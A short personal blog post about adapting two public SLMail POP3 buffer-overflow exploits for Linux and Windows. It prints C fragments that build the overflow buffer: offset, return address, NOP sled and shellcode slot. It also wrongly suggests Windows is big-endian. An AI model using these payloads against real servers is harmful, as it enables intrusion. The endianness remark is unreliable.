SHARE:

Modifying some exploit code

Spread the love

So I have been working on some exploit code for the past couple of days. The code is around a fairly old piece of software called SLMail. I liked the Python version of the exploit as it was straightforward while the compiled binary was a little more involved. The linux exploit is on exploit-db ( https://www.exploit-db.com/exploits/643/ ) but this exploit did not seem to work so a slight modification is needed below. I also fixed the windows binary as well ( https://www.exploit-db.com/exploits/646/ )

643

This file seemed to be fairly straight forward, I had to modify the payload to suit my needs and enter these lines:

#define retadd "\x8f\x35\x4a\x5f" 
#define port 110


int main(int argc, char *argv[])
{
    int xs;
    char out[1024];
    char *buffer = malloc(3500);
    memset(buffer, 0x00, 3500);
    char *off = malloc(2606);

    memset(off, 0x41, 2606);
    char *nop = malloc(16);

    memset(nop, 0x90, 16);
    strcat(buffer, off);
    strcat(buffer, retadd);
    strcat(buffer, nop);
    strcat(buffer, shellcode);

Since it was written towards linux it was easy to compile under GCC.

646

This one is exactly the same exploit except it was written as a Windows executable. So I had to use Mingw32 to cross compile this code. Some key takeaways I learned from this code was that the EIP address needed to be inserted in Big Endian format which took trial an error because it seemed to show up correctly on the EIP register in Immunity dbg.  ( Github link )

void exploit(int sock) {
      FILE *test;
      char *ptr;
      char userbuf[] = "USER generaluser\r\n";
      char evil[3501];
      char buf[3501];
      char receive[1024];
      char nopsled[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
                       "\x90\x90\x90\x90\x90\x90\x90\x90"
           "\x90\x90";
      memset(buf, 0x00, 3500);
      memset(evil, 0x00, 3500);
      memset(evil, 0x43, 3450);
      *(long*)&evil[2606] = 0x5f4a358f; // Windows is Big Endian?
      ptr = &evil[2610];
      memcpy(ptr, &nopsled, 16);
      ptr = &evil[2626];
      memcpy(ptr, &shellcode, 351);

 

 

Written by

gseeto

Technology, Science and Philosophy